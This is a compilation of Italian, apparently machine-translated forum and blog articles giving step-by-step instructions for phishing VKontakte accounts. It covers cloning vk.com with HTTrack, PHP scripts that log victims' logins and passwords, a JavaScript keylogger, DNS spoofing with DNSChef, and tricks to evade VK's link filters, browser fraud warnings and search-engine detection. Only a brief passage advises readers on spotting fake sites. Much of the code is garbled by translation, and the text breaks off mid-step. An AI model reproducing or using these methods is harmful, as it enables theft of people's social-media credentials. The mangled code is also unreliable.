Alcuni anni fa, il metodo di phishing era molto popolare, ma ora i servizi hanno imparato a rilevarlo, trovano e bloccano le pagine false. Pertanto, esiste un metodo di phishing più avanzato.
Oggi molte persone usano i social network, ogni giorno le persone cercano di hackerare l'account Vkontakte di qualcuno, mail.ru, gmail e altri servizi e lo fanno gratuitamente. Il più delle volte, le persone sono alla ricerca di un'app magica per hackerare Vkontakte, ma ti mostreremo qualcos'altro. Questo è phishing. Ma in questo articolo (a differenza del precedente), ne prenderemo in considerazione una versione alternativa.
Rinominare il file index.html nel file vk.jpg, questo è necessario per confondere il sistema di sicurezza Vkontakte;
Crea un file vuoto chiamato security.php, aprilo nel blocco note, inserisci il seguente codice
$ id = $ _GET ["codice"];
if ($ id == "conferma email") (
$ mioFile = "vk.jpg";
$ fh = fopen ($ mioFile, "r");
$ theData = fread ($ fh, 500000); fchiudi ($ fh);
$ mioFile1 = "conferma.jpg";
$ fh1 = fopen ($ mioFile1, "r");
$ theData1 = fread ($ fh1, 500000);
echo $ theData1; )
e salvalo accanto a vk.jpg;
Crea un file confirm.jpg, aprilo anche nel blocco note e inserisci la seguente riga al suo interno:
grazie per aver confermato il tuo indirizzo email.
Salva;
Assicurati di avere i file di cui hai bisogno
e una cartella con tutti gli script Vkontakte, senza di essi la tua pagina falsa verrà visualizzata in modo errato;
Carica questi file sul tuo host web;
Questo metodo è adatto anche se la vittima accede da un dispositivo Android. E con un set di script, puoi hackerare un gran numero di account su Vkontakte. Oltre ai costi di hosting, questo è un modo gratuito per ottenere una password.
Questo è solo un metodo per superare i sistemi di sicurezza di un social network o di un servizio di posta elettronica. Ma oggi, per hackerare Vkontakte, devi conoscere molti di questi metodi. I meccanismi anti-phishing migliorano ogni giorno e i proprietari dei servizi stringono sempre di più le viti, senza lasciare scappatoie per gli hacker. Ma la forza del metodo di hacking sta proprio in un altro. Vale a dire, nell'abile manipolazione delle persone, la capacità di identificare e utilizzare le loro debolezze. Scrivere una buona prima pagina non è nemmeno metà della battaglia, perché se non si hanno sufficienti competenze di ingegneria sociale, semplicemente non ha senso farlo.
Saluti, abitanti del forum! Oggi parleremo di phishing Vkontakte. Innanzitutto ci tengo a dire che l'articolo cita alcuni servizi, non consideratelo una pubblicità. L'articolo è stato scritto a scopo informativo e non sto incoraggiando nessuno a intraprendere le azioni descritte nell'articolo.
Come sai, il phishing VK era molto popolare, ma dopo l'aggiornamento di VKontakte, la politica di sicurezza ha iniziato a esaurirsi. É davvero? Dopotutto, nulla è fermo e con la nuova politica di sicurezza sono arrivati nuovi metodi di phishing.
In questo articolo ti parlerò un po' dei "problemi" del sito VK fish e delle loro soluzioni usando l'esempio di un sito a lungo fuso in uno pubblico. (I sorgenti possono essere scaricati qui: Ya.Disk
Qual è la prima cosa che salta all'occhio quando apri un sito del genere?
- Aspetto sospetto: il sito sembra una vecchia versione mobile di VK, il cambio di lingua non funziona, i vecchi caratteri e un logo pixelato suggeriscono immediatamente che siamo su un sito dannoso.
- Mancanza di una versione desktop del sito: sì, capisco che l'80% del traffico VK proviene da dispositivi mobili, ma comunque devi essere pronto a tutto, soprattutto se sei impegnato in hacking individuale.
- Tali siti vengono immediatamente contrassegnati dai browser come "fraudolenti": il fatto è che il browser prima di tutto guarda al certificato SSL o alla sua assenza, e così via. i phisher distribuiscono principalmente siti fish su hosting gratuito, quindi non è possibile ottenere almeno un certificato SSL DV lì. i siti sono contrassegnati come "fraudolenti" e quindi l'account di hosting viene bannato.
- Completa mancanza di convalida dei dati: tutto ciò che ho visto in tali script è fondamentalmente un modulo con i campi "login", "password", un pulsante e una registrazione di questa roba in un blocco note. Nessun controllo di convalida, campi vuoti o BadRequest ... Non sto nemmeno parlando di lavorare con account 2FA. Massimo: una richiesta all'API VK per ricevere un token.
- Invio di messaggi contenente un collegamento a un sito di phishing: durante l'invio di messaggi, il testo era qualcosa del genere: "Oh Dio, hai vinto il concorso di repost, segui il collegamento
Devi essere registrato per vedere i link.
E ottieni $ 100.500. "Beh, devi ammettere che sembra stupido. Ma sì, questo è ancora in corso ... sono rimaste poche persone così ingenue, e per lo più bambini.
- Accorciare i link: per consentire a VK di saltare i collegamenti ai siti di pesca, è stato necessario eseguire un reindirizzamento + una riduzione, di conseguenza, il collegamento si è rivelato simile
Devi essere registrato per vedere i link.
Questo ha solo rovinato l'aspetto del messaggio.
Accorciare i link
Come ho fatto quando stavo appena imparando il phishing: ho creato un sito su uCoz, nell'editor di pagine HTML ho aggiunto uno script che reindirizzava a un sito fish. Quindi ho guidato l'URL del sito in vk.cc e ho ottenuto un collegamento già pronto, che VK ha passato. Come evitare queste sciocchezze? È molto semplice. Ci sono due modi:
- Non accorceremo i collegamenti da vk.cc, ma imbroglieremo un po' con uCoz. (Se stai usando un sito di sondaggi come un sito di sondaggi, questo è generalmente fantastico)
- Ottieni un certificato SSL per il tuo dominio.
Spoiler: frode con uCoz
Creeremo qualsiasi sito con un nome che corrisponda al tema del sito di posa
Andiamo nella scheda Moduli e creiamo una pagina del sito web
Chiamiamolo in qualche modo, lo chiamerò "test", se hai un site-laying come un voto, puoi nominare la pagina "golos-za-ivana-pupkina"
Ora andiamo al nostro sito, quindi alla scheda "test" che abbiamo appena creato e copiamo l'URL da qualche parte
Andiamo alla sezione Design => Editor => Site Pages... e tra
inserire le seguenti righe:
Di conseguenza, seguendo il link
Devi essere registrato per vedere i link.
Saremo trasferiti al sito di cui abbiamo bisogno. Ora non è necessario abbreviare tali collegamenti tramite vk.cc. VK li salterà senza problemi e durante l'invio ci priveremo delle domande del destinatario "Oh, una sorta di collegamento sospetto ... non è sicuramente una bufala?"
Ottenere un certificato SSL
Come ho detto, è necessario un certificato SSL in modo che browser e antivirus non segnalino il nostro sito di phishing come "fraudolente". Inoltre, i collegamenti a un sito con SSL vengono saltati da VK, il che significa che le manipolazioni sopra descritte non saranno necessarie, possiamo semplicemente eliminare il collegamento nella sua forma originale.
Spoiler: Otteniamo un certificato SSL
Al momento, ci sono molti siti di hosting che lavorano con le autorità di certificazione. La soluzione più semplice al problema con SSL è distribuire i tuoi siti, proprio su tale hosting. Il loro pannello di controllo ha già una scheda con la gestione SSL, dove puoi ordinare un nuovo certificato, installarne uno tuo o gestire i certificati esistenti.
Inoltre, per ridurre la probabilità di bloccare un sito contrassegnato come fraudolento, puoi prescrivere nel file .htaccess un divieto di indicizzazione da parte dei bot dei motori di ricerca.
Spoiler: Cosa aggiungere a .htaccess
SetEnvIfNoCase User-Agent "^ Googlebot" search_bot
SetEnvIfNoCase User-Agent "^ Yandex" search_bot
SetEnvIfNoCase User-Agent "^ Yahoo" search_bot
SetEnvIfNoCase User-Agent "^ Aport" search_bot
SetEnvIfNoCase User-Agent "^ msnbot" search_bot
SetEnvIfNoCase User-Agent "^ spider" search_bot
SetEnvIfNoCase User-Agent "^ Robot" search_bot
SetEnvIfNoCase User-Agent "^ php" search_bot
SetEnvIfNoCase User-Agent "^ Mail" search_bot
SetEnvIfNoCase User-Agent "^ bot" search_bot
SetEnvIfNoCase User-Agent "^ igdeSpyder" search_bot
SetEnvIfNoCase User-Agent "^ Snapbot" search_bot
SetEnvIfNoCase User-Agent "^ WordPress" search_bot
Agente utente SetEnvIfNoCase "^ BlogPulseLive" search_bot
SetEnvIfNoCase User-Agent "^ Parser" search_bot
Bene, per ora questo è tutto. Ho ancora molte informazioni su VK, quindi se qualcuno vuole discutere di phishing VK, fare una domanda o qualsiasi altra cosa, per favore vai alla LAN del forum. Sempre aperto a nuove idee. Spero che queste informazioni ti siano state utili ;)
In questo articolo, il comando AiutoU, descriverà in dettaglio lo schema di phishing per gli account di un popolare social network In contatto con.
Quindi andiamo.
Per lavoro abbiamo bisogno Kali Linux la versione più recente, che è al momento, oltre alla conoscenza a riguardo, l'abbiamo scritta in precedenza. Ma per il sito VK, descriveremo tutto individualmente.
Quindi, prendiamo il sito: vk.com. In questa fase, non tutto è difficile, puoi semplicemente copiare. Ma solo una cosa, se copi solo il codice sorgente della pagina, otteniamo tale "sporco":
Abbastanza impresentabile...
Cloneremo il sito, o meglio la sua pagina di benvenuto. Per questo useremo. Infatti questo programma è unico, può copiare sia l'intero sito che le sue singole parti.
Il modo più semplice per eseguire questo programma sarebbe simile a questo:
Httrack vk.com -O / var / www / html
Ma per VK sconsigliamo di farlo, perché copiare l'intero VK, non l'idea più intelligente. Questo viene spesso fatto su siti più piccoli per un'analisi completa della struttura di tutte le cartelle e file. Ma in questa fase, agiremo secondo uno scenario diverso.
Innanzitutto, è necessario utilizzare un parametro per inserire un agente utente.
Di conseguenza, utilizzeremo il parametro:
F Mozilla / 5.0 (Windows NT 6.1) ApleWebKit / 537.36 (KHTML, come Gecko) Chrome / 41.0.228.0 Safari / 537.36
Httrack https://vk.com -r2 -F Mozilla / 5.0 (Windows NT 6.1) AppleWebKit / 537.36 (KHTML, come Gecko) Chrome / 41.0.228.0 Safari / 537.36 -O "/var/www/html/vk.com "
Dopo di che vedremo:
Il sito verrà copiato. Nella cartella vk.com ci saranno diversi file che ho creato, puoi eliminarli e lasciare solo una cartella vk.com
Elimina, sposta i file da una sottocartella vk.com nella cartella vk.com più in alto, e quindi non avremo il percorso nella barra degli indirizzi: localhost / vk.com / vk.com
Dopo aver manipolato i file, l'indirizzo sarà: localhost / vk.com
Tutto è chiaro con la versione web. Ma se provi a copiare la versione mobile di VKontakte ( m.vk.com), ci saranno delle difficoltà, ci javascript verifica la validità dell'indirizzo e impedisce il caricamento della pagina. Ma anche questo ha la sua vulnerabilità.
Il comando sarà il seguente:
Httrack https://m.vk.com -r2 -F "Mozilla / 5.0 (Linux; U; Android 4.0.3; ru-ru; LG-L160L Build / IML74K) AppleWebkit / 999 + (KHTML, come Gecko) Safari /999.9 "-O" /var/www/html/mvk/"
Quando il sito viene copiato e si tenta di accedervi, non ne verrà fuori nulla, quindi è necessario eseguire il seguente comando:
Nano /var/www/html/mvk/m.vk.com/index.html
Seleziona la riga evidenziata nello screenshot ed eliminala.
E il sito funziona benissimo.
Quindi, abbiamo siti identici all'originale. Ma i log non vengono salvati da nessuna parte e non saremo in grado di vedere chi ha martellato cosa nei campi, quindi iniziamo a programmare web. Implementeremo nel nostro sito keylogger, lo scriveremo su php e javascript.
Crea 3 file keylogger.php, keylogger.js e keylog.txt
V keylogger.php introduciamo:
$ chiave = $ _ POST ["chiave"];$ logfile = "keylog.txt";
$ fp = fopen ($ file di registro, "a");
fwrite ($ fp, $ chiave);
fchiudi ($ fp);
?>
V keyloger.js introduciamo:
Document.onkeypres = funcion (evt) (evt = evt || window.evnt key = String.fromCharode (evt.charode) if (key) (var http = new XMLHtpRequest (); var parm = encodeURI (key) http.open ("POST", "keylogger.php", true); http.setReqestHeder ("Contnt-type", "aplication / x-ww-form-urlenoded"); http.send ("key =" + parm);) )
nel nostro index.php devi aggiungere la riga:
Fatto, abbiamo finito keylogger.
Ora iniziamo a modificare index.php: cercando la linea " Accesso"E cerca il parametro onclick = 'top.showBox'(cambia l'indirizzo in https://vk.com)
Dopodiché, quando premi il pulsante Accesso l'utente sarà indirizzato al sito ufficiale In contatto con.
Entriamo attraverso SSH Su VPS.
# wget htps: //thesprwl.org/media/projcts/dnscef-0.3.zip # unzip dnscef-0.3.zip # cd dnshef * # chod 755 * .py
La soluzione migliore sarebbe che è meglio inserire i seguenti parametri qui:
# pi installa dnslib # pi installa IPy
Crea un file: host.txt
In esso scriviamo quanto segue:
(URL sito, nel nostro caso vk.com = IP_YOUR_VPS)
Prescrivendo il seguente comando, eseguiremo tutto:
./dnschf.py -i 0.0.0.0 --logfle = log.txt --file = hosts.txt
Fatto, tuo DNS funziona con successo. Ci restituisce i nostri indirizzi.
Questo è tutto, speriamo che questo articolo ti sia stato utile.
Cordiali saluti, squadra AiutoU.
Negazione di responsabilità: Questo articolo è stato scritto solo a scopo didattico. L'autore o l'editore non ha pubblicato questo articolo per scopi dannosi. Se i lettori desiderano utilizzare le informazioni per guadagno personale, l'autore e l'editore non sono responsabili per eventuali danni o danni causati.In questo articolo ti dirò cos'è il phishing di VKontakte. Come non farsi beccare su un sito di phishing e non bruciare le proprie credenziali. Darò anche un esempio di creazione di un sito del genere.
Che cos'è il phishing?
In generale, la parola pesca è tradotta come pesca. Il phishing è uno spoofing di un sito Web in cui gli utenti inseriscono le proprie credenziali, come "login" e "password", e quindi reindirizzano al sito Web ufficiale in modo che non vi siano sospetti. Una persona cattiva "ravanello" riconosce le tue credenziali e può entrare nel sito con il tuo nome utente.
Sii attento
Come puoi scivolare su un sito del genere, ci sono un paio di esempi.
- Su qualsiasi risorsa potrebbe esserci un link che dice: "aggiungimi come amico e ottieni 10 voti VKontakte per questo". D'accordo, allettante? La vittima segue questo link, arriva a un sito che sembra non essere diverso dal sito VKontakte, inserisce un "login" e una "password". Sale sulla sua pagina, non c'erano più voti. Pensa a lungo e alla fine segna su questo argomento, e i dati dell'account sono già al "ravanello".
- La tua ragazza o il tuo ragazzo ti danno un link al sito, con il pretesto tipo Gatto =) Tu, senza pensarci due volte, segui il link, inserisci il tuo "login" e "password". E il tuo altro significativo ora conosce le tue credenziali e sarà in grado di vedere con chi stai scrivendo =)
E ci sono molte altre opzioni su come attirare una vittima in un sito del genere.
Vedi dove stai andando, se sei attualmente in un contatto e ti viene dato un link, ci clicchi sopra, vedi la pagina di autorizzazione, dovresti avere subito un sospetto. Presta attenzione all'indirizzo del sito web. Diciamo VKontakte, il suo indirizzo: vk.com o vkontakte.ru. Non molte persone riescono a ricordare nomi di dominio di siti Web lunghi, sono i più facili da falsificare. Penso che per questo motivo il social network VKontakte sia passato a un indirizzo di dominio così breve che sarebbe più difficile falsificarlo. Se vedi l'indirizzo vk.org, allora non vedrai davvero un problema, se scrivi qualcosa dopo di esso, ad esempio: quindi, in generale, un indirizzo come indirizzo. Bene, se ti viene chiesto di inserire una password da qualche parte, controlla attentamente l'indirizzo del dominio.
Creazione di un sito di phishing
Questo materiale viene fornito esclusivamente a scopo informativo e non per violare i conti dei tuoi conoscenti e amici, ricorda inoltre che si tratta di un procedimento penale.
E quindi darò un esempio di creazione di un sito di phishing per il social network VKontakte.
Apri qualsiasi browser, vai su vk.com,
Nome file: index.html
Tipo di file: pagina Web, completamente con immagini. Premiamo il pulsante, Salva.
Ora è necessario creare uno script che trasmetterà i dati inseriti nel campo login e password. Chiamiamolo icq.php
Apri il blocco note e incolla lì questo codice.
$ Accesso = $ _POST; // Accesso vittima
$ Passa = $ _POST ['zena']; // Password della vittima
$ log = fopen (“ups.php”, ”a +”); // le password delle vittime saranno qui
fwrite ($ log, "
$ Accesso: $ Passa \ n ”); // scrivi su ups.phpfclose ($ log); // close ups.php
eco "
”; // reindirizza la vittima a http://vk.com
Chiudi e salva come icq.php
Apri il file index.html nel blocco note. Apri la ricerca (ctrl + f) e invio